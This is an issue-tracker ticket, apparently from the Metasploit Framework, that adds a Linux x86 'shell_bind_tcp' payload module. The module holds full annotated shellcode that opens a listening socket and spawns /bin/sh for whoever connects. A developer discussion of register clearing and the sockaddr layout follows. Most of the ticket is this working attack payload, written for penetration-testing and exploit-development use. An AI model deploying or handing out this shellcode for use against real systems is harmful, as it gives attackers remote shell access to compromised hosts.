Ticket #106 (closed enhancement: fixed)

Opened 21 months ago

Last modified 18 months ago

New single shell_bind_tcp payload module for Linux x86

Reported by: ramon@… Owned by: mmiller
Priority: minor Milestone:
Component: framework3 Version:
Keywords: Cc:

Description 

require 'msf/core'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'

module Msf
module Payloads
module Singles
module Linux
module X86

module ShellBindTcp

	include Msf::Payload::Single

	def initialize(info = {})
		super(merge_info(info,
			'Name'          => 'Linux Command Shell, Bind TCP Inline',
			'Version'       => '$Revision$',
			'Description'   => 'Listen for a connection and spawn a command shell',
			'Author'        => 'Ramon de Carvalho Valle <ramon@risesecurity.org>',
			'License'       => GPL_LICENSE,
			'Platform'      => 'linux',
			'Arch'          => ARCH_X86,
			'Handler'       => Msf::Handler::BindTcp,
			'Session'       => Msf::Sessions::CommandShell,
			'Payload'       =>
				{
					'Offsets' =>
						{
							'LPORT'    => [ 21, 'n' ],
						},
					'Payload' =>
							"\x31\xdb"             +#   xorl    %ebx,%ebx                  #
							"\xf7\xe3"             +#   mull    %ebx                       #
							"\x53"                 +#   pushl   %ebx                       #
							"\x43"                 +#   incl    %ebx                       #
							"\x53"                 +#   pushl   %ebx                       #
							"\x6a\x02"             +#   pushl   $0x02                      #
							"\x89\xe1"             +#   movl    %esp,%ecx                  #
							"\xb0\x66"             +#   movb    $0x66,%al                  #
							"\xcd\x80"             +#   int     $0x80                      #
							"\x5b"                 +#   popl    %ebx                       #
							"\x5e"                 +#   popl    %esi                       #
							"\x52"                 +#   pushl   %edx                       #
							"\x68\xff\x02\x04\xd2" +#   pushl   $0xd20402ff                #
							"\x6a\x10"             +#   pushl   $0x10                      #
							"\x51"                 +#   pushl   %ecx                       #
							"\x50"                 +#   pushl   %eax                       #
							"\x89\xe1"             +#   movl    %esp,%ecx                  #
							"\x6a\x66"             +#   pushl   $0x66                      #
							"\x58"                 +#   popl    %eax                       #
							"\xcd\x80"             +#   int     $0x80                      #
							"\x89\x41\x04"         +#   movl    %eax,0x04(%ecx)            #
							"\xb3\x04"             +#   movb    $0x04,%bl                  #
							"\xb0\x66"             +#   movb    $0x66,%al                  #
							"\xcd\x80"             +#   int     $0x80                      #
							"\x43"                 +#   incl    %ebx                       #
							"\xb0\x66"             +#   movb    $0x66,%al                  #
							"\xcd\x80"             +#   int     $0x80                      #
							"\x93"                 +#   xchgl   %eax,%ebx                  #
							"\x59"                 +#   popl    %ecx                       #
							"\x6a\x3f"             +#   pushl   $0x3f                      #
							"\x58"                 +#   popl    %eax                       #
							"\xcd\x80"             +#   int     $0x80                      #
							"\x49"                 +#   decl    %ecx                       #
							"\x79\xf8"             +#   jns     <bndsockcode+50>           #
							"\x68\x2f\x2f\x73\x68" +#   pushl   $0x68732f2f                #
							"\x68\x2f\x62\x69\x6e" +#   pushl   $0x6e69622f                #
							"\x89\xe3"             +#   movl    %esp,%ebx                  #
							"\x50"                 +#   pushl   %eax                       #
							"\x53"                 +#   pushl   %ebx                       #
							"\x89\xe1"             +#   movl    %esp,%ecx                  #
							"\xb0\x0b"             +#   movb    $0x0b,%al                  #
							"\xcd\x80"              #   int     $0x80                      #
				}
			))
	end

end

end end end end end

Change History

Changed 20 months ago by mmiller

  • owner changed from hdm to mmiller

Looks like this is smaller than the existing one, going to look into it

Changed 19 months ago by vlad902

This payload has a number of bugs making it smaller. It does not clear eax before doing mov al, 0x66, doesn't clear edx before using it as a null value, initializes sin_family incorrectly, etc.

Changed 19 months ago by ramon@…

The first movb $0x66,%al is ok because %eax is already zero as a result of the mull %ebx instruction. As we usually doesn't do error checking, we assume that bind() and listen() is sucessful and returns zero, so it's ok to movb $0x66,%al after bind() and listen(). In other cases where %eax is modified or returns non zero value i used pushl $0x66, popl %eax combination. The sin_family is ok because the linux bind() system call maintains backward compatibility with some unix implementations where the sockaddr_in struct is:

struct sockaddr_in {

uchar sin_len = xx (does not matter for AF_INET) uchar sin_family = 02 (AF_INET) ushort sin_port = contains the port value uint sin_addr.s_addr = 00 (INADDR_ANY)

}

You can check it on kernel sources and here also:

http://www.lsd-pl.net/projects/asmcodes.zip

Best regards, Ramon

Changed 19 months ago by ramon@…

Ahh, forgot to say that %edx was also cleared as a result of mull %ebx, with returns its multiplication result on %eax:%edx clearing both.

Best regards, Ramon

Changed 18 months ago by ramon

  • status changed from new to closed
  • resolution set to fixed

(In [5068]) Fixes #106. Added new single shell_bind_tcp payload module for Linux x86. See #106.

Note: See TracTickets for help on using tickets.